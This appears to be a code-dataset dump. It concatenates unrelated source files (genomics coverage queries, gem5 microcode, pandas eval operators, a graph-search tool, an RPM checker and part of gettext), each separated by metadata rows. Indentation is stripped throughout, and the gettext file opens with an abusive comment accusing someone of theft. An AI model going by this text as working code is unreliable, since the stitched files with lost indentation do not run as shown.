chr_coverage = [coverage for _, _, coverage in chromosomes]
LOG.debug('predicting sex')
predicted_sex = predict_sex(*chr_coverage)
sample_obj = Sample.query.get(sample_id)
sample_row = {
'sample': sample_obj.name or sample_obj.id,
'group': sample_obj.group_name,
'analysis_date': sample_obj.created_at,
'sex': predicted_sex,
'x_coverage': chr_coverage[0],
'y_coverage': chr_coverage[1],
}
yield sample_row
def keymetrics_rows(samples_ids, genes=None):
"""Generate key metrics rows."""
query = (
api.query(
TranscriptStat,
func.avg(TranscriptStat.mean_coverage).label('mean_coverage'),
func.avg(TranscriptStat.completeness_10).label('completeness_10'),
func.avg(TranscriptStat.completeness_15).label('completeness_15'),
func.avg(TranscriptStat.completeness_20).label('completeness_20'),
func.avg(TranscriptStat.completeness_50).label('completeness_50'),
func.avg(TranscriptStat.completeness_100).label('completeness_100'),
)
.filter(TranscriptStat.sample_id.in_(samples_ids))
.group_by(TranscriptStat.sample_id)
)
if genes:
query = (query.join(TranscriptStat.transcript)
.filter(Transcript.gene_id.in_(genes)))
return query
def transcripts_rows(sample_ids, genes=None, level=10):
"""Generate metrics rows for transcripts."""
for sample_id in sample_ids:
sample_obj = Sample.query.get(sample_id)
all_tx = TranscriptStat.query.filter_by(sample_id=sample_id)
if genes:
all_tx = (all_tx.join(TranscriptStat.transcript)
.filter(Transcript.gene_id.in_(genes)))
tx_count = all_tx.count()
stat_field = getattr(TranscriptStat, LEVELS[level])
missed_tx = all_tx.filter(stat_field < 100)
missed_count = missed_tx.count()
if tx_count == 0:
tx_yield = 0
flash("no matching transcripts found!")
else:
tx_yield = 100 - (missed_count / tx_count * 100)
yield {
'sample': sample_obj,
'yield': tx_yield,
'missed': missed_tx,
'missed_count': missed_count,
'total': tx_count,
}
def diagnostic_yield(api, genes=None, samples=None, group=None, level=10):
"""Calculate transcripts that aren't completely covered.
This metric only applies to one sample in isolation. Otherwise
it's hard to know what to do with exons that are covered or
not covered across multiple samples.
Args:
sample_id (str): unique sample id
"""
threshold = 100
str_level = "completeness_{}".format(level)
completeness_col = getattr(TranscriptStat, str_level)
all_tx = api.query(Transcript)
missed_tx = (api.query(TranscriptStat)
.filter(completeness_col < threshold)
.order_by(TranscriptStat.sample_id))
if genes:
missed_tx = (missed_tx.join(TranscriptStat.transcript)
.filter(Transcript.gene_id.in_(genes)))
all_tx = all_tx.filter(Transcript.gene_id.in_(genes))
samples_query = api.query(Sample.id)
if samples:
samples_query = samples_query.filter(Sample.id.in_(samples))
missed_tx = missed_tx.filter(TranscriptStat.sample_id.in_(samples))
elif group:
samples_query = samples_query.filter_by(group_id=group)
missed_tx = (missed_tx.join(TranscriptStat.sample).filter(Sample.group_id == group))
all_count = all_tx.count()
all_samples = [row[0] for row in samples_query.all()]
sample_groups = itertools.groupby(missed_tx, key=lambda tx: tx.sample_id)
missed_samples = {}
for sample_id, tx_models in sample_groups:
gene_ids = set()
tx_count = 0
for tx_model in tx_models:
gene_ids.add(tx_model.transcript.gene_id)
tx_count += 1
diagnostic_yield = 100 - (tx_count / all_count * 100)
result = {'sample_id': sample_id}
result['diagnostic_yield'] = diagnostic_yield
result['count'] = tx_count
result['total_count'] = all_count
result['genes'] = list(gene_ids)
missed_samples[sample_id] = result
for sample_id in all_samples:
if sample_id in missed_samples:
yield missed_samples[sample_id]
else:
# all transcripts are covered!
result = {'sample_id': sample_id, 'diagnostic_yield': 100}
yield result
| mit | 223,761,722,041,765,950 | 35.2 | 92 | 0.620427 | false |
liangwang/m5 | src/arch/x86/isa/insts/general_purpose/input_output/string_io.py | 1 | 4234 | # Copyright (c) 2007-2008 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop INS_M_R {
# Find the constant we need to either add or subtract from rdi
ruflag t0, 10
movi t3, t3, dsz, flags=(CEZF,), dataSize=asz
subi t4, t0, dsz, dataSize=asz
mov t3, t3, t4, flags=(nCEZF,), dataSize=asz
zexti t2, reg, 15, dataSize=8
ld t6, intseg, [1, t2, t0], "IntAddrPrefixIO << 3", addressSize=8
st t6, es, [1, t0, rdi]
add rdi, rdi, t3, dataSize=asz
};
def macroop INS_E_M_R {
and t0, rcx, rcx, flags=(EZF,), dataSize=asz
br label("end"), flags=(CEZF,)
# Find the constant we need to either add or subtract from rdi
ruflag t0, 10
movi t3, t3, dsz, flags=(CEZF,), dataSize=asz
subi t4, t0, dsz, dataSize=asz
mov t3, t3, t4, flags=(nCEZF,), dataSize=asz
zexti t2, reg, 15, dataSize=8
topOfLoop:
ld t6, intseg, [1, t2, t0], "IntAddrPrefixIO << 3", addressSize=8
st t6, es, [1, t0, rdi]
subi rcx, rcx, 1, flags=(EZF,), dataSize=asz
add rdi, rdi, t3, dataSize=asz
br label("topOfLoop"), flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop OUTS_R_M {
# Find the constant we need to either add or subtract from rdi
ruflag t0, 10
movi t3, t3, dsz, flags=(CEZF,), dataSize=asz
subi t4, t0, dsz, dataSize=asz
mov t3, t3, t4, flags=(nCEZF,), dataSize=asz
zexti t2, reg, 15, dataSize=8
ld t6, ds, [1, t0, rsi]
st t6, intseg, [1, t2, t0], "IntAddrPrefixIO << 3", addressSize=8
add rsi, rsi, t3, dataSize=asz
};
def macroop OUTS_E_R_M {
and t0, rcx, rcx, flags=(EZF,), dataSize=asz
br label("end"), flags=(CEZF,)
# Find the constant we need to either add or subtract from rdi
ruflag t0, 10
movi t3, t3, dsz, flags=(CEZF,), dataSize=asz
subi t4, t0, dsz, dataSize=asz
mov t3, t3, t4, flags=(nCEZF,), dataSize=asz
zexti t2, reg, 15, dataSize=8
topOfLoop:
ld t6, ds, [1, t0, rsi]
st t6, intseg, [1, t2, t0], "IntAddrPrefixIO << 3", addressSize=8
subi rcx, rcx, 1, flags=(EZF,), dataSize=asz
add rsi, rsi, t3, dataSize=asz
br label("topOfLoop"), flags=(nCEZF,)
end:
fault "NoFault"
};
'''
| bsd-3-clause | -5,485,469,004,281,648,000 | 36.803571 | 72 | 0.705716 | false |
pjryan126/solid-start-careers | store/api/zillow/venv/lib/python2.7/site-packages/pandas/computation/ops.py | 1 | 15283 | """Operator classes for eval.
"""
import operator as op
from functools import partial
from datetime import datetime
import numpy as np
import pandas as pd
from pandas.compat import PY3, string_types, text_type
import pandas.core.common as com
import pandas.lib as lib
from pandas.core.base import StringMixin
from pandas.computation.common import _ensure_decoded, _result_type_many
from pandas.computation.scope import _DEFAULT_GLOBALS
_reductions = 'sum', 'prod'
_unary_math_ops = ('sin', 'cos', 'exp', 'log', 'expm1', 'log1p',
'sqrt', 'sinh', 'cosh', 'tanh', 'arcsin', 'arccos',
'arctan', 'arccosh', 'arcsinh', 'arctanh', 'abs')
_binary_math_ops = ('arctan2',)
_mathops = _unary_math_ops + _binary_math_ops
_LOCAL_TAG = '__pd_eval_local_'
class UndefinedVariableError(NameError):
"""NameError subclass for local variables."""
def __init__(self, name, is_local):
if is_local:
msg = 'local variable {0!r} is not defined'
else:
msg = 'name {0!r} is not defined'
super(UndefinedVariableError, self).__init__(msg.format(name))
class Term(StringMixin):
def __new__(cls, name, env, side=None, encoding=None):
klass = Constant if not isinstance(name, string_types) else cls
supr_new = super(Term, klass).__new__
return supr_new(klass)
def __init__(self, name, env, side=None, encoding=None):
self._name = name
self.env = env
self.side = side
tname = text_type(name)
self.is_local = (tname.startswith(_LOCAL_TAG) or
tname in _DEFAULT_GLOBALS)
self._value = self._resolve_name()
self.encoding = encoding
@property
def local_name(self):
return self.name.replace(_LOCAL_TAG, '')
def __unicode__(self):
return com.pprint_thing(self.name)
def __call__(self, *args, **kwargs):
return self.value
def evaluate(self, *args, **kwargs):
return self
def _resolve_name(self):
res = self.env.resolve(self.local_name, is_local=self.is_local)
self.update(res)
if hasattr(res, 'ndim') and res.ndim > 2:
raise NotImplementedError("N-dimensional objects, where N > 2,"
" are not supported with eval")
return res
def update(self, value):
"""
search order for local (i.e., @variable) variables:
scope, key_variable
[('locals', 'local_name'),
('globals', 'local_name'),
('locals', 'key'),
('globals', 'key')]
"""
key = self.name
# if it's a variable name (otherwise a constant)
if isinstance(key, string_types):
self.env.swapkey(self.local_name, key, new_value=value)
self.value = value
@property
def isscalar(self):
return lib.isscalar(self._value)
@property
def type(self):
try:
# potentially very slow for large, mixed dtype frames
return self._value.values.dtype
except AttributeError:
try:
# ndarray
return self._value.dtype
except AttributeError:
# scalar
return type(self._value)
return_type = type
@property
def raw(self):
return com.pprint_thing('{0}(name={1!r}, type={2})'
''.format(self.__class__.__name__, self.name,
self.type))
@property
def is_datetime(self):
try:
t = self.type.type
except AttributeError:
t = self.type
return issubclass(t, (datetime, np.datetime64))
@property
def value(self):
return self._value
@value.setter
def value(self, new_value):
self._value = new_value
@property
def name(self):
return self._name
@name.setter
def name(self, new_name):
self._name = new_name
@property
def ndim(self):
return self._value.ndim
class Constant(Term):
def __init__(self, value, env, side=None, encoding=None):
super(Constant, self).__init__(value, env, side=side,
encoding=encoding)
def _resolve_name(self):
return self._name
@property
def name(self):
return self.value
_bool_op_map = {'not': '~', 'and': '&', 'or': '|'}
class Op(StringMixin):
"""Hold an operator of arbitrary arity
"""
def __init__(self, op, operands, *args, **kwargs):
self.op = _bool_op_map.get(op, op)
self.operands = operands
self.encoding = kwargs.get('encoding', None)
def __iter__(self):
return iter(self.operands)
def __unicode__(self):
"""Print a generic n-ary operator and its operands using infix
notation"""
# recurse over the operands
parened = ('({0})'.format(com.pprint_thing(opr))
for opr in self.operands)
return com.pprint_thing(' {0} '.format(self.op).join(parened))
@property
def return_type(self):
# clobber types to bool if the op is a boolean operator
if self.op in (_cmp_ops_syms + _bool_ops_syms):
return np.bool_
return _result_type_many(*(term.type for term in com.flatten(self)))
@property
def has_invalid_return_type(self):
types = self.operand_types
obj_dtype_set = frozenset([np.dtype('object')])
return self.return_type == object and types - obj_dtype_set
@property
def operand_types(self):
return frozenset(term.type for term in com.flatten(self))
@property
def isscalar(self):
return all(operand.isscalar for operand in self.operands)
@property
def is_datetime(self):
try:
t = self.return_type.type
except AttributeError:
t = self.return_type
return issubclass(t, (datetime, np.datetime64))
def _in(x, y):
"""Compute the vectorized membership of ``x in y`` if possible, otherwise
use Python.
"""
try:
return x.isin(y)
except AttributeError:
if com.is_list_like(x):
try:
return y.isin(x)
except AttributeError:
pass
return x in y
def _not_in(x, y):
"""Compute the vectorized membership of ``x not in y`` if possible,
otherwise use Python.
"""
try:
return ~x.isin(y)
except AttributeError:
if com.is_list_like(x):
try:
return ~y.isin(x)
except AttributeError:
pass
return x not in y
_cmp_ops_syms = '>', '<', '>=', '<=', '==', '!=', 'in', 'not in'
_cmp_ops_funcs = op.gt, op.lt, op.ge, op.le, op.eq, op.ne, _in, _not_in
_cmp_ops_dict = dict(zip(_cmp_ops_syms, _cmp_ops_funcs))
_bool_ops_syms = '&', '|', 'and', 'or'
_bool_ops_funcs = op.and_, op.or_, op.and_, op.or_
_bool_ops_dict = dict(zip(_bool_ops_syms, _bool_ops_funcs))
_arith_ops_syms = '+', '-', '*', '/', '**', '//', '%'
_arith_ops_funcs = (op.add, op.sub, op.mul, op.truediv if PY3 else op.div,
op.pow, op.floordiv, op.mod)
_arith_ops_dict = dict(zip(_arith_ops_syms, _arith_ops_funcs))
_special_case_arith_ops_syms = '**', '//', '%'
_special_case_arith_ops_funcs = op.pow, op.floordiv, op.mod
_special_case_arith_ops_dict = dict(zip(_special_case_arith_ops_syms,
_special_case_arith_ops_funcs))
_binary_ops_dict = {}
for d in (_cmp_ops_dict, _bool_ops_dict, _arith_ops_dict):
_binary_ops_dict.update(d)
def _cast_inplace(terms, dtype):
"""Cast an expression inplace.
Parameters
----------
terms : Op
The expression that should cast.
dtype : str or numpy.dtype
The dtype to cast to.
"""
dt = np.dtype(dtype)
for term in terms:
try:
new_value = term.value.astype(dt)
except AttributeError:
new_value = dt.type(term.value)
term.update(new_value)
def is_term(obj):
return isinstance(obj, Term)
class BinOp(Op):
"""Hold a binary operator and its operands
Parameters
----------
op : str
left : Term or Op
right : Term or Op
"""
def __init__(self, op, lhs, rhs, **kwargs):
super(BinOp, self).__init__(op, (lhs, rhs))
self.lhs = lhs
self.rhs = rhs
self._disallow_scalar_only_bool_ops()
self.convert_values()
try:
self.func = _binary_ops_dict[op]
except KeyError:
# has to be made a list for python3
keys = list(_binary_ops_dict.keys())
raise ValueError('Invalid binary operator {0!r}, valid'
' operators are {1}'.format(op, keys))
def __call__(self, env):
"""Recursively evaluate an expression in Python space.
Parameters
----------
env : Scope
Returns
-------
object
The result of an evaluated expression.
"""
# handle truediv
if self.op == '/' and env.scope['truediv']:
self.func = op.truediv
# recurse over the left/right nodes
left = self.lhs(env)
right = self.rhs(env)
return self.func(left, right)
def evaluate(self, env, engine, parser, term_type, eval_in_python):
"""Evaluate a binary operation *before* being passed to the engine.
Parameters
----------
env : Scope
engine : str
parser : str
term_type : type
eval_in_python : list
Returns
-------
term_type
The "pre-evaluated" expression as an instance of ``term_type``
"""
if engine == 'python':
res = self(env)
else:
# recurse over the left/right nodes
left = self.lhs.evaluate(env, engine=engine, parser=parser,
term_type=term_type,
eval_in_python=eval_in_python)
right = self.rhs.evaluate(env, engine=engine, parser=parser,
term_type=term_type,
eval_in_python=eval_in_python)
# base cases
if self.op in eval_in_python:
res = self.func(left.value, right.value)
else:
res = pd.eval(self, local_dict=env, engine=engine,
parser=parser)
name = env.add_tmp(res)
return term_type(name, env=env)
def convert_values(self):
"""Convert datetimes to a comparable value in an expression.
"""
def stringify(value):
if self.encoding is not None:
encoder = partial(com.pprint_thing_encoded,
encoding=self.encoding)
else:
encoder = com.pprint_thing
return encoder(value)
lhs, rhs = self.lhs, self.rhs
if is_term(lhs) and lhs.is_datetime and is_term(rhs) and rhs.isscalar:
v = rhs.value
if isinstance(v, (int, float)):
v = stringify(v)
v = pd.Timestamp(_ensure_decoded(v))
if v.tz is not None:
v = v.tz_convert('UTC')
self.rhs.update(v)
if is_term(rhs) and rhs.is_datetime and is_term(lhs) and lhs.isscalar:
v = lhs.value
if isinstance(v, (int, float)):
v = stringify(v)
v = pd.Timestamp(_ensure_decoded(v))
if v.tz is not None:
v = v.tz_convert('UTC')
self.lhs.update(v)
def _disallow_scalar_only_bool_ops(self):
if ((self.lhs.isscalar or self.rhs.isscalar) and
self.op in _bool_ops_dict and
(not (issubclass(self.rhs.return_type, (bool, np.bool_)) and
issubclass(self.lhs.return_type, (bool, np.bool_))))):
raise NotImplementedError("cannot evaluate scalar only bool ops")
def isnumeric(dtype):
return issubclass(np.dtype(dtype).type, np.number)
class Div(BinOp):
"""Div operator to special case casting.
Parameters
----------
lhs, rhs : Term or Op
The Terms or Ops in the ``/`` expression.
truediv : bool
Whether or not to use true division. With Python 3 this happens
regardless of the value of ``truediv``.
"""
def __init__(self, lhs, rhs, truediv, *args, **kwargs):
super(Div, self).__init__('/', lhs, rhs, *args, **kwargs)
if not isnumeric(lhs.return_type) or not isnumeric(rhs.return_type):
raise TypeError("unsupported operand type(s) for {0}:"
" '{1}' and '{2}'".format(self.op,
lhs.return_type,
rhs.return_type))
if truediv or PY3:
_cast_inplace(com.flatten(self), np.float_)
_unary_ops_syms = '+', '-', '~', 'not'
_unary_ops_funcs = op.pos, op.neg, op.invert, op.invert
_unary_ops_dict = dict(zip(_unary_ops_syms, _unary_ops_funcs))
class UnaryOp(Op):
"""Hold a unary operator and its operands
Parameters
----------
op : str
The token used to represent the operator.
operand : Term or Op
The Term or Op operand to the operator.
Raises
------
ValueError
* If no function associated with the passed operator token is found.
"""
def __init__(self, op, operand):
super(UnaryOp, self).__init__(op, (operand,))
self.operand = operand
try:
self.func = _unary_ops_dict[op]
except KeyError:
raise ValueError('Invalid unary operator {0!r}, valid operators '
'are {1}'.format(op, _unary_ops_syms))
def __call__(self, env):
operand = self.operand(env)
return self.func(operand)
def __unicode__(self):
return com.pprint_thing('{0}({1})'.format(self.op, self.operand))
@property
def return_type(self):
operand = self.operand
if operand.return_type == np.dtype('bool'):
return np.dtype('bool')
if (isinstance(operand, Op) and
(operand.op in _cmp_ops_dict or operand.op in _bool_ops_dict)):
return np.dtype('bool')
return np.dtype('int')
class MathCall(Op):
def __init__(self, func, args):
super(MathCall, self).__init__(func.name, args)
self.func = func
def __call__(self, env):
operands = [op(env) for op in self.operands]
return self.func.func(*operands)
def __unicode__(self):
operands = map(str, self.operands)
return com.pprint_thing('{0}({1})'.format(self.op, ','.join(operands)))
class FuncNode(object):
def __init__(self, name):
if name not in _mathops:
raise ValueError(
"\"{0}\" is not a supported function".format(name))
self.name = name
self.func = getattr(np, name)
def __call__(self, *args):
return MathCall(self, args)
| gpl-2.0 | 6,329,813,673,056,946,000 | 27.727444 | 79 | 0.543676 | false |
MathGaron/mean_average_precision | mean_average_precision/ap_accumulator.py | 1 | 1262 | """
Simple accumulator class that keeps track of True positive, False positive and False negative
to compute precision and recall of a certain class
"""
class APAccumulator:
def __init__(self):
self.TP, self.FP, self.FN = 0, 0, 0
def inc_good_prediction(self, value=1):
self.TP += value
def inc_bad_prediction(self, value=1):
self.FP += value
def inc_not_predicted(self, value=1):
self.FN += value
@property
def precision(self):
total_predicted = self.TP + self.FP
if total_predicted == 0:
total_gt = self.TP + self.FN
if total_gt == 0:
return 1.
else:
return 0.
return float(self.TP) / total_predicted
@property
def recall(self):
total_gt = self.TP + self.FN
if total_gt == 0:
return 1.
return float(self.TP) / total_gt
def __str__(self):
str = ""
str += "True positives : {}\n".format(self.TP)
str += "False positives : {}\n".format(self.FP)
str += "False Negatives : {}\n".format(self.FN)
str += "Precision : {}\n".format(self.precision)
str += "Recall : {}\n".format(self.recall)
return str | mit | 3,655,848,321,890,244,000 | 27.066667 | 97 | 0.543582 | false |
AugustoLD/SearchAlgorithms-IA | graph_search.py | 1 | 4000 | #*************************************************************************
# Copyright (C) 2015
#
# Augusto Lopez Dantas - [email protected]
# Daniel Yang Chow - [email protected]
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#*************************************************************************
import sys
from graph_file import GraphFile
from a_star import AStar
from dijkstra import Dijkstra
graph_file = None
graph = {}
heuristic = {}
begin = None
end = None
def setup(filename):
global graph_file, graph, begin, end, heuristic
graph_file = GraphFile()
while not graph_file.read_file(filename):
filename = str(input("New file path: ")).rstrip()
graph = graph_file.construct_graph()
heuristic = graph_file.construct_heuristic_table()
begin = graph_file.begin
end = graph_file.end
def alter_graph_file():
new_file = str(input('New file path: ')).rstrip()
setup(new_file)
def alter_end():
global end, heuristic
target = str(input('New target node: '))
if target in graph:
end = target
heuristic = graph_file.construct_heuristic_table(end)
else:
print('Error: Invalid node!')
input('Press Enter...')
def alter_begin():
global begin
start = str(input('New starting node: '))
if start in graph:
begin = start
else:
print('Error: Invalid node!')
input('Press Enter...')
def show_graph():
graph_file.print_graph(graph)
input('Press Enter...')
def show_heuristic():
if graph_file.is_heuristic_complete(heuristic):
graph_file.print_heuristic(heuristic, end)
else:
print('Error: heuristic is incomplete for the target {}!'.format(end))
input('Press Enter...')
def run_a_star():
if graph_file.is_heuristic_complete(heuristic):
AStar(graph).search_path(begin, end, heuristic)
else:
print('Error: heuristic is incomplete for the target {}!'.format(end))
input('Press Enter...')
def run_dijkstra():
Dijkstra(graph).search_path(begin, end)
input('Press Enter...')
def run_search_algorithms():
menu = {
'1': run_dijkstra,
'2': run_a_star,
'3': alter_begin,
'4': alter_end
}
menu_opt = ""
while menu_opt != '0':
print('-'*70, '\n', 'Search Algorithms'.center(70))
print('-'*70)
print('1 - Dijkstra')
print('2 - A*')
print('3 - Change Starting Node (current: {})'.format(begin))
print('4 - Change Target Node (current: {})'.format(end))
print('0 - Back')
menu_opt = input()
if menu_opt in menu:
menu[menu_opt]()
def run():
menu = {
'1': run_search_algorithms,
'2': show_graph,
'3': show_heuristic,
'4': alter_graph_file
}
menu_opt = ""
while menu_opt != '0':
print('-'*70, '\n', 'Graph Search'.center(70))
print('-'*70)
print('1 - Run Search Algorithms')
print('2 - Show Graph')
print('3 - Show Heuristic Table')
print('4 - Change Graph File')
print('0 - Quit')
menu_opt = input()
if menu_opt in menu:
menu[menu_opt]()
if __name__ == '__main__':
try:
filename = sys.argv[1]
except IndexError:
filename = ""
setup(filename)
run()
| gpl-2.0 | 18,317,909,692,897,096 | 28.62963 | 78 | 0.59075 | false |
bluezd/pkg-build-tool | libpkgbuild/compareRPMRH.py | 1 | 2550 | #!/usr/bin/python
import os
from rpmUtils.miscutils import splitFilename
from library import Environment, CommandLineUI
class CompareRPMRH(Environment):
"""docstring for CompareRPMRH"""
def __init__(self):
super(CompareRPMRH, self).__init__()
self.ui = CommandLineUI(echoResponses=False)
self.actions = (
(">>> Would you like to modify the location of isoft rpm build dir(%s)?" %(self.rpm_build_dir),
" >>> Please specifiy the new location of rpm build dir: ",
"self.rpm_build_dir"),
(">>> Would you like to modify the location of RH CDROM dir(%s)?" %(self.rh_cdrom_dir),
" >>> Please specifiy the new location of RH CDROM dir: ",
"self.rh_cdrom_dir")
)
def run(self):
"""docstring for run"""
for action in self.actions:
answer = self.ui.promptConfirm(action[0])
if answer:
while True:
res = self.ui.prompt(action[1])
if os.path.exists(res):
if action[2] == "self.rpm_build_dir":
self.rpm_build_dir = res
elif action[2] == "self.rh_cdrom_dir":
self.rh_cdrom_dir = res
break
else:
print "!! %s does not exist, please input again !!" %(res)
os.system("clear")
if os.path.exists(self.rh_cdrom_dir) and \
os.path.exists(self.rpm_build_dir):
print "### Starting Verifying ###"
isoft_build_rpm_list = list()
not_build = False
for files in os.listdir(self.rpm_build_dir):
(n, v, r, e, a) = splitFilename(files)
if a == self.arch and n not in isoft_build_rpm_list:
isoft_build_rpm_list.append(n)
for files in os.listdir(self.rh_cdrom_dir):
(n, v, r, e, a) = splitFilename(files)
if a == self.arch and n not in isoft_build_rpm_list:
not_build = True
print "### FAIL: %s Has Not Been Built ###" %(files)
if not not_build:
print "### PASS: All Arch Related RPMs Have Been Built ###"
else:
print "!! Error: file does not exist !!"
if __name__ == "__main__":
CompareRPMRH().run()
| apache-2.0 | 6,371,365,530,659,757,000 | 41.5 | 107 | 0.479608 | false |
DedMemez/ODS-August-2017 | gettext.py | 1 | 14996 | # Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: gettext
import locale, copy, os, re, struct, sys
from errno import ENOENT
__all__ = ['NullTranslations',
'GNUTranslations',
'Catalog',
'find',
'translation',
'install',
'textdomain',
'bindtextdomain',
'dgettext',
'dngettext',
'gettext',
'ngettext']
_default_localedir = os.path.join(sys.prefix, 'share', 'locale')
def test(condition, true, false):
if condition:
return true
else:
return false
def c2py(plural):
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import token, tokenize
tokens = tokenize.generate_tokens(StringIO(plural).readline)
try:
danger = [ x for x in tokens if x[0] == token.NAME and x[1] != 'n' ]
except tokenize.TokenError:
raise ValueError, 'plural forms expression error, maybe unbalanced parenthesis'
else:
if danger:
raise ValueError, 'plural forms expression could be dangerous'
plural = plural.replace('&&', ' and ')
plural = plural.replace('||', ' or ')
expr = re.compile('\\!([^=])')
plural = expr.sub(' not \\1', plural)
expr = re.compile('(.*?)\\?(.*?):(.*)')
def repl(x):
return 'test(%s, %s, %s)' % (x.group(1), x.group(2), expr.sub(repl, x.group(3)))
stack = ['']
for c in plural:
if c == '(':
stack.append('')
elif c == ')':
if len(stack) == 1:
raise ValueError, 'unbalanced parenthesis in plural form'
s = expr.sub(repl, stack.pop())
stack[-1] += '(%s)' % s
else:
stack[-1] += c
plural = expr.sub(repl, stack.pop())
return eval('lambda n: int(%s)' % plural)
def _expand_lang(locale):
from locale import normalize
locale = normalize(locale)
COMPONENT_CODESET = 1
COMPONENT_TERRITORY = 2
COMPONENT_MODIFIER = 4
mask = 0
pos = locale.find('@')
if pos >= 0:
modifier = locale[pos:]
locale = locale[:pos]
mask |= COMPONENT_MODIFIER
else:
modifier = ''
pos = locale.find('.')
if pos >= 0:
codeset = locale[pos:]
locale = locale[:pos]
mask |= COMPONENT_CODESET
else:
codeset = ''
pos = locale.find('_')
if pos >= 0:
territory = locale[pos:]
locale = locale[:pos]
mask |= COMPONENT_TERRITORY
else:
territory = ''
language = locale
ret = []
for i in range(mask + 1):
if not i & ~mask:
val = language
if i & COMPONENT_TERRITORY:
val += territory
if i & COMPONENT_CODESET:
val += codeset
if i & COMPONENT_MODIFIER:
val += modifier
ret.append(val)
ret.reverse()
return ret
class NullTranslations:
def __init__(self, fp = None):
self._info = {}
self._charset = None
self._output_charset = None
self._fallback = None
if fp is not None:
self._parse(fp)
return
def _parse(self, fp):
pass
def add_fallback(self, fallback):
if self._fallback:
self._fallback.add_fallback(fallback)
else:
self._fallback = fallback
def gettext(self, message):
if self._fallback:
return self._fallback.gettext(message)
return message
def lgettext(self, message):
if self._fallback:
return self._fallback.lgettext(message)
return message
def ngettext(self, msgid1, msgid2, n):
if self._fallback:
return self._fallback.ngettext(msgid1, msgid2, n)
elif n == 1:
return msgid1
else:
return msgid2
def lngettext(self, msgid1, msgid2, n):
if self._fallback:
return self._fallback.lngettext(msgid1, msgid2, n)
elif n == 1:
return msgid1
else:
return msgid2
def ugettext(self, message):
if self._fallback:
return self._fallback.ugettext(message)
return unicode(message)
def ungettext(self, msgid1, msgid2, n):
if self._fallback:
return self._fallback.ungettext(msgid1, msgid2, n)
elif n == 1:
return unicode(msgid1)
else:
return unicode(msgid2)
def info(self):
return self._info
def charset(self):
return self._charset
def output_charset(self):
return self._output_charset
def set_output_charset(self, charset):
self._output_charset = charset
def install(self, unicode = False, names = None):
import __builtin__
__builtin__.__dict__['_'] = unicode and self.ugettext or self.gettext
if hasattr(names, '__contains__'):
if 'gettext' in names:
__builtin__.__dict__['gettext'] = __builtin__.__dict__['_']
if 'ngettext' in names:
__builtin__.__dict__['ngettext'] = unicode and self.ungettext or self.ngettext
if 'lgettext' in names:
__builtin__.__dict__['lgettext'] = self.lgettext
if 'lngettext' in names:
__builtin__.__dict__['lngettext'] = self.lngettext
class GNUTranslations(NullTranslations):
LE_MAGIC = 2500072158L
BE_MAGIC = 3725722773L
def _parse(self, fp):
unpack = struct.unpack
filename = getattr(fp, 'name', '')
self._catalog = catalog = {}
self.plural = lambda n: int(n != 1)
buf = fp.read()
buflen = len(buf)
magic = unpack('<I', buf[:4])[0]
if magic == self.LE_MAGIC:
version, msgcount, masteridx, transidx = unpack('<4I', buf[4:20])
ii = '<II'
elif magic == self.BE_MAGIC:
version, msgcount, masteridx, transidx = unpack('>4I', buf[4:20])
ii = '>II'
else:
raise IOError(0, 'Bad magic number', filename)
for i in xrange(0, msgcount):
mlen, moff = unpack(ii, buf[masteridx:masteridx + 8])
mend = moff + mlen
tlen, toff = unpack(ii, buf[transidx:transidx + 8])
tend = toff + tlen
if mend < buflen and tend < buflen:
msg = buf[moff:mend]
tmsg = buf[toff:tend]
else:
raise IOError(0, 'File is corrupt', filename)
if mlen == 0:
lastk = k = None
for item in tmsg.splitlines():
item = item.strip()
if not item:
continue
if ':' in item:
k, v = item.split(':', 1)
k = k.strip().lower()
v = v.strip()
self._info[k] = v
lastk = k
elif lastk:
self._info[lastk] += '\n' + item
if k == 'content-type':
self._charset = v.split('charset=')[1]
elif k == 'plural-forms':
v = v.split(';')
plural = v[1].split('plural=')[1]
self.plural = c2py(plural)
if '\x00' in msg:
msgid1, msgid2 = msg.split('\x00')
tmsg = tmsg.split('\x00')
if self._charset:
msgid1 = unicode(msgid1, self._charset)
